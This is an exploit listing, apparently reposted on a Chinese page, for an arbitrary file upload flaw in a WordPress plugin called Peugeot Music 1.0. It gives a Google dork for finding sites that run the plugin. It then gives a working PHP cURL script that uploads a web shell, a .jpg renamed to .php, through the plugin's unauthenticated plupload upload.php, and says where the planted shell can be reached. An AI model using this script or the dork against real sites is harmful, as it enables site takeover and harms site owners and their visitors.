扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
# Exploit Title: WordPress Plugin Peugeot Music - Arbitrary File Upload # Google Dork: inurl:/wp-content/plugins/peugeot-music-plugin/ # Date: 2018-05-23 # Exploit Author: Mr.7z # Vendor Homepage: - # Software Link: - # Version: 1.0 # Tested on: Windows 10 64bit (Home Edition) # Exploit: /wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php # Vuln? {"jsonrpc" : "2.0", "result" : null, "id" : "id"} # CSRF <?php $url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here $post = array ( "file" => "@yourshell.jpg", "name" => "yourshell.php" ); $ch = curl_init ("$url"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_POST, 1); @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); $data = curl_exec ($ch); curl_close ($ch); echo $data; ?> # For CSRF using php xampp. # Shell Locate: target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php # Thanks To XaiSyndicate - Family Attack Cyber - HunterSec-Team - # Typical Idiot Security [!] |
体验盒子
